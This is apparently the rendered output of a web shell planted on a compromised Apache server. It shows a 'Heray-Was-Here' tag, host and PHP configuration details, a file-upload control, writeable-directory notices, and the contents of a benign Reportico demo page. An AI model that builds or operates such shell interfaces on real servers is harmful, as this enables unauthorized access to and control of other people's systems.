Heray-Was-Here
Server : Apache
System : Linux mail.lomejor.cr 6.8.0-1059-azure #65~22.04.1-Ubuntu SMP Thu May 28 16:59:19 UTC 2026 x86_64
User : www-data ( 33)
PHP Version : 8.2.31
Disable Function : NONE
Directory :  /var/www/dev/htdocs/custom/reportes/include/reportico/examples/examples/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /var/www/dev/htdocs/custom/reportes/include/reportico/examples/examples/designer-overview.php
<?php
include (__DIR__."/header.php");

$description = "The designer allows you to create a set of predefined reports under a project ( all stored as XML files in the Reportico projects area ) which can be grouped into a project. This makes the reports accessible from a menu.
<br><br>
    You can design the reports when entering design mode as the Reportico admin user which you access via the password you enter when setting up Reportico for the first time. This allows access to the admin menu where you can create projects and reports.
<br><br>
To access the designer just point your browser at the reportico top level folder.
<br><br>
    For a live demo of the Reportico design mode in action go to the <a style=\"color:#0000ff; text-decoration: underline\"href='example.designer-demo.php?section=designer'>Designer Demo Page</a>.
";


$usage_method = false;

$example_description = false;

include (__DIR__."/content.php");
include (__DIR__."/trailer.php");
?>

Hry